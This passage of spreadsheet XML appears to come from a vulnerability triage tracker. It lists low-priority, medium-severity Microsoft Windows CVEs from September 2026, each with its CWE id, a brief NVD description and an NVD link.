t="inlineStr"><is><t>CVE-2026-69457</t></is></c><c r="D1271" s="5" t="n"><v>5.5</v></c><c r="E1271" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1271" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1271" s="5" t="inlineStr" /><c r="H1271" s="5" t="n"><v>0.004</v></c><c r="I1271" s="5" t="inlineStr" /><c r="J1271" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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1" s="5" t="inlineStr" /><c r="M1271" s="5" t="inlineStr" /><c r="N1271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1271" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1271" s="5" t="inlineStr" /><c r="R1271" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1271" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t></is></c></row><row r="1272"><c r="A1272" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1272" s="5" t="inlineStr"><is><t>CVE-2026-69504</t></is></c><c r="D1272" s="5" t="n"><v>5.5</v></c><c r="E1272" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1272" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1272" s="5" t="inlineStr" /><c r="H1272" s="5" t="n"><v>0.004</v></c><c r="I1272" s="5" t="inlineStr" /><c r="J1272" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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2" s="5" t="inlineStr" /><c r="M1272" s="5" t="inlineStr" /><c r="N1272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1272" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1272" s="5" t="inlineStr" /><c r="R1272" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1272" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t></is></c></row><row r="1273"><c r="A1273" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1273" s="5" t="inlineStr"><is><t>CVE-2026-69527</t></is></c><c r="D1273" s="5" t="n"><v>5.5</v></c><c r="E1273" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1273" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1273" s="5" t="inlineStr" /><c r="H1273" s="5" t="n"><v>0.004</v></c><c r="I1273" s="5" t="inlineStr" /><c r="J1273" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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3" s="5" t="inlineStr" /><c r="M1273" s="5" t="inlineStr" /><c r="N1273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1273" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1273" s="5" t="inlineStr" /><c r="R1273" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1273" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t></is></c></row><row r="1274"><c r="A1274" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1274" s="5" t="inlineStr"><is><t>CVE-2026-69531</t></is></c><c r="D1274" s="5" t="n"><v>5.5</v></c><c r="E1274" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1274" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1274" s="5" t="inlineStr" /><c r="H1274" s="5" t="n"><v>0.003</v></c><c r="I1274" s="5" t="inlineStr" /><c r="J1274" s="5" t="inlineStr" /><c r="K1274" s="5" t="inlineStr" /><c r="L1274" s="5" t="inlineStr" /><c r="M1274" s="5" t="inlineStr" /><c r="N1274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1274" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1274" s="5" t="inlineStr" /><c r="R1274" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1274" s="5" t="inlineStr"><is><t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t></is></c></row><row r="1275"><c r="A1275" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1275" s="5" t="inlineStr"><is><t>CVE-2026-69554</t></is></c><c r="D1275" s="5" t="n"><v>5.5</v></c><c r="E1275" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1275" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1275" s="5" t="inlineStr" /><c r="H1275" s="5" t="n"><v>0.003</v></c><c r="I1275" s="5" t="inlineStr" /><c r="J1275" s="5" t="inlineStr" /><c r="K1275" s="5" t="inlineStr" /><c r="L1275" s="5" t="inlineStr" /><c r="M1275" s="5" t="inlineStr" /><c r="N1275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1275" s="5" t="inlineStr" /><c r="R1275" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1275" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t></is></c></row><row r="1276"><c r="A1276" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1276" s="5" t="inlineStr"><is><t>CVE-2026-69568</t></is></c><c r="D1276" s="5" t="n"><v>5.5</v></c><c r="E1276" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1276" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1276" s="5" t="inlineStr" /><c r="H1276" s="5" t="n"><v>0.004</v></c><c r="I1276" s="5" t="inlineStr" /><c r="J1276" s="5" t="inlineStr" /><c r="K1276" s="5" t="inlineStr" /><c r="L1276" s="5" t="inlineStr" /><c r="M1276" s="5" t="inlineStr" /><c r="N1276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1276" s="5" t="inlineStr" /><c r="R1276" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1276" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t></is></c><c r="T1276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t></is></c></row><row r="1277"><c r="A1277" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1277" s="5" t="inlineStr"><is><t>CVE-2026-69609</t></is></c><c r="D1277" s="5" t="n"><v>5.5</v></c><c r="E1277" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1277" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1277" s="5" t="inlineStr" /><c r="H1277" s="5" t="n"><v>0.004</v></c><c r="I1277" s="5" t="inlineStr" /><c r="J1277" s="5" t="inlineStr" /><c r="K1277" s="5" t="inlineStr" /><c r="L1277" s="5" t="inlineStr" /><c r="M1277" s="5" t="inlineStr" /><c r="N1277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1277" s="5" t="inlineStr" /><c r="R1277" s="5" t="inlineStr"><is><t>CWE-125, CWE-193</t></is></c><c r="S1277" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t></is></c></row><row r="1278"><c r="A1278" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1278" s="5" t="inlineStr"><is><t>CVE-2026-69616</t></is></c><c r="D1278" s="5" t="n"><v>5.5</v></c><c r="E1278" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1278" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1278" s="5" t="inlineStr" /><c r="H1278" s="5" t="n"><v>0.004</v></c><c r="I1278" s="5" t="inlineStr" /><c r="J1278" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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8" s="5" t="inlineStr" /><c r="M1278" s="5" t="inlineStr" /><c r="N1278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1278" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1278" s="5" t="inlineStr" /><c r="R1278" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1278" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t></is></c><c r="T1278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t></is></c></row><row r="1279"><c r="A1279" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1279" s="5" t="inlineStr"><is><t>CVE-2026-69618</t></is></c><c r="D1279" s="5" t="n"><v>5.5</v></c><c r="E1279" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1279" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1279" s="5" t="inlineStr" /><c r="H1279" s="5" t="n"><v>0.004</v></c><c r="I1279" s="5" t="inlineStr" /><c r="J1279" s="5" t="inlineStr" /><c r="K1279" s="5" t="inlineStr" /><c r="L1279" s="5" t="inlineStr" /><c r="M1279" s="5" t="inlineStr" /><c r="N1279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1279" s="5" t="inlineStr" /><c r="R1279" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1279" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t></is></c><c r="T1279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t></is></c></row><row r="1280"><c r="A1280" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1280" s="5" t="inlineStr"><is><t>CVE-2026-69627</t></is></c><c r="D1280" s="5" t="n"><v>5.5</v></c><c r="E1280" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1280" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1280" s="5" t="inlineStr" /><c r="H1280" s="5" t="n"><v>0.004</v></c><c r="I1280" s="5" t="inlineStr" /><c r="J1280" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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0" s="5" t="inlineStr" /><c r="M1280" s="5" t="inlineStr" /><c r="N1280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1280" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1280" s="5" t="inlineStr" /><c r="R1280" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1280" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t></is></c></row><row r="1281"><c r="A1281" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1281" s="5" t="inlineStr"><is><t>CVE-2026-69672</t></is></c><c r="D1281" s="5" t="n"><v>5.5</v></c><c r="E1281" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1281" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1281" s="5" t="inlineStr" /><c r="H1281" s="5" t="n"><v>0.004</v></c><c r="I1281" s="5" t="inlineStr" /><c r="J1281" s="5" t="inlineStr" /><c r="K1281" s="5" t="inlineStr" /><c r="L1281" s="5" t="inlineStr" /><c r="M1281" s="5" t="inlineStr" /><c r="N1281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1281" s="5" t="inlineStr" /><c r="R1281" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1281" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t></is></c></row><row r="1282"><c r="A1282" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1282" s="5" t="inlineStr"><is><t>CVE-2026-69674</t></is></c><c r="D1282" s="5" t="n"><v>5.5</v></c><c r="E1282" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1282" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1282" s="5" t="inlineStr" /><c r="H1282" s="5" t="n"><v>0.003</v></c><c r="I1282" s="5" t="inlineStr" /><c r="J1282" s="5" t="inlineStr" /><c r="K1282" s="5" t="inlineStr" /><c r="L1282" s="5" t="inlineStr" /><c r="M1282" s="5" t="inlineStr" /><c r="N1282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1282" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1282" s="5" t="inlineStr" /><c r="R1282" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1282" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t></is></c></row><row r="1283"><c r="A1283" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1283" s="5" t="inlineStr"><is><t>CVE-2026-69684</t></is></c><c r="D1283" s="5" t="n"><v>5.5</v></c><c r="E1283" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1283" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1283" s="5" t="inlineStr" /><c r="H1283" s="5" t="n"><v>0.005</v></c><c r="I1283" s="5" t="inlineStr" /><c r="J1283" s="5" t="inlineStr" /><c r="K1283" s="5" t="inlineStr" /><c r="L1283" s="5" t="inlineStr" /><c r="M1283" s="5" t="inlineStr" /><c r="N1283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1283" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1283" s="5" t="inlineStr" /><c r="R1283" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1283" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t></is></c><c r="T1283" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t></is></c></row><row r="1284"><c r="A1284" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1284" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1284" s="5" t="inlineStr"><is><t>CVE-2026-69741</t></is></c><c r="D1284" s="5" t="n"><v>5.5</v></c><c r="E1284" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1284" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1284" s="5" t="inlineStr" /><c r="H1284" s="5" t="n"><v>0.004</v></c><c r="I1284" s="5" t="inlineStr" /><c r="J1284" s="5" t="inlineStr" /><c r="K1284" s="5" t="inlineStr" /><c r="L1284" s="5" t="inlineStr" /><c r="M1284" s="5" t="inlineStr" /><c r="N1284" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1284" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1284" s="5" t="inlineStr" /><c r="R1284" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1284" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1284" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t></is></c></row><row r="1285"><c r="A1285" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1285" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1285" s="5" t="inlineStr"><is><t>CVE-2026-69770</t></is></c><c r="D1285" s="5" t="n"><v>5.5</v></c><c r="E1285" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1285" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1285" s="5" t="inlineStr" /><c r="H1285" s="5" t="n"><v>0.004</v></c><c r="I1285" s="5" t="inlineStr" /><c r="J1285" s="5" t="inlineStr" /><c r="K1285" s="5" t="inlineStr" /><c r="L1285" s="5" t="inlineStr" /><c r="M1285" s="5" t="inlineStr" /><c r="N1285" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1285" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1285" s="5" t="inlineStr" /><c r="R1285" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1285" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1285" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t></is></c></row><row r="1286"><c r="A1286" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1286" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1286" s="5" t="inlineStr"><is><t>CVE-2026-69794</t></is></c><c r="D1286" s="5" t="n"><v>5.5</v></c><c r="E1286" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1286" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1286" s="5" t="inlineStr" /><c r="H1286" s="5" t="n"><v>0.004</v></c><c r="I1286" s="5" t="inlineStr" /><c r="J1286" s="5" t="inlineStr" /><c r="K1286" s="5" t="inlineStr" /><c r="L1286" s="5" t="inlineStr" /><c r="M1286" s="5" t="inlineStr" /><c r="N1286" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1286" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1286" s="5" t="inlineStr" /><c r="R1286" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1286" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1286" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t></is></c></row><row r="1287"><c r="A1287" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1287" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1287" s="5" t="inlineStr"><is><t>CVE-2026-69808</t></is></c><c r="D1287" s="5" t="n"><v>5.5</v></c><c r="E1287" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1287" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1287" s="5" t="inlineStr" /><c r="H1287" s="5" t="n"><v>0.004</v></c><c r="I1287" s="5" t="inlineStr" /><c r="J1287" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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7" s="5" t="inlineStr" /><c r="M1287" s="5" t="inlineStr" /><c r="N1287" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1287" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1287" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1287" s="5" t="inlineStr" /><c r="R1287" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1287" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1287" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t></is></c></row><row r="1288"><c r="A1288" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1288" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1288" s="5" t="inlineStr"><is><t>CVE-2026-69862</t></is></c><c r="D1288" s="5" t="n"><v>5.5</v></c><c r="E1288" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1288" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1288" s="5" t="inlineStr" /><c r="H1288" s="5" t="n"><v>0.005</v></c><c r="I1288" s="5" t="inlineStr" /><c r="J1288" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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88" s="5" t="inlineStr" /><c r="M1288" s="5" t="inlineStr" /><c r="N1288" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1288" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1288" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1288" s="5" t="inlineStr" /><c r="R1288" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="S1288" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1288" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t></is></c></row><row r="1289"><c r="A1289" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1289" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1289" s="5" t="inlineStr"><is><t>CVE-2026-70145</t></is></c><c r="D1289" s="5" t="n"><v>5.5</v></c><c r="E1289" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1289" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1289" s="5" t="inlineStr" /><c r="H1289" s="5" t="n"><v>0.004</v></c><c r="I1289" s="5" t="inlineStr" /><c r="J1289" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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9" s="5" t="inlineStr" /><c r="M1289" s="5" t="inlineStr" /><c r="N1289" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1289" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1289" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1289" s="5" t="inlineStr" /><c r="R1289" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1289" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1289" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t></is></c></row><row r="1290"><c r="A1290" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1290" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1290" s="5" t="inlineStr"><is><t>CVE-2026-70290</t></is></c><c r="D1290" s="5" t="n"><v>5.5</v></c><c r="E1290" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1290" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1290" s="5" t="inlineStr" /><c r="H1290" s="5" t="n"><v>0.004</v></c><c r="I1290" s="5" t="inlineStr" /><c r="J1290" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K129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0" s="5" t="inlineStr" /><c r="M1290" s="5" t="inlineStr" /><c r="N1290" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1290" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1290" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1290" s="5" t="inlineStr" /><c r="R1290" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1290" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t></is></c><c r="T1290" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t></is></c></row><row r="1291"><c r="A1291" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1291" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1291" s="5" t="inlineStr"><is><t>CVE-2026-71341</t></is></c><c r="D1291" s="5" t="n"><v>5.5</v></c><c r="E1291" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1291" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1291" s="5" t="inlineStr" /><c r="H1291" s="5" t="n"><v>0.004</v></c><c r="I1291" s="5" t="inlineStr" /><c r="J1291" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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1" s="5" t="inlineStr" /><c r="M1291" s="5" t="inlineStr" /><c r="N1291" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1291" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1291" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1291" s="5" t="inlineStr" /><c r="R1291" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1291" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1291" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t></is></c></row><row r="1292"><c r="A1292" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1292" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1292" s="5" t="inlineStr"><is><t>CVE-2026-72937</t></is></c><c r="D1292" s="5" t="n"><v>5.5</v></c><c r="E1292" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1292" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1292" s="5" t="inlineStr" /><c r="H1292" s="5" t="n"><v>0.004</v></c><c r="I1292" s="5" t="inlineStr" /><c r="J1292" s="5" t="inlineStr" /><c r="K1292" s="5" t="inlineStr" /><c r="L1292" s="5" t="inlineStr" /><c r="M1292" s="5" t="inlineStr" /><c r="N1292" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1292" s="5" t="inlineStr" /><c r="R1292" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1292" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72937</t></is></c></row><row r="1293"><c r="A1293" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1293" s="5" t="inlineStr"><is><t>CVE-2026-72945</t></is></c><c r="D1293" s="5" t="n"><v>5.5</v></c><c r="E1293" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1293" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1293" s="5" t="inlineStr" /><c r="H1293" s="5" t="n"><v>0.004</v></c><c 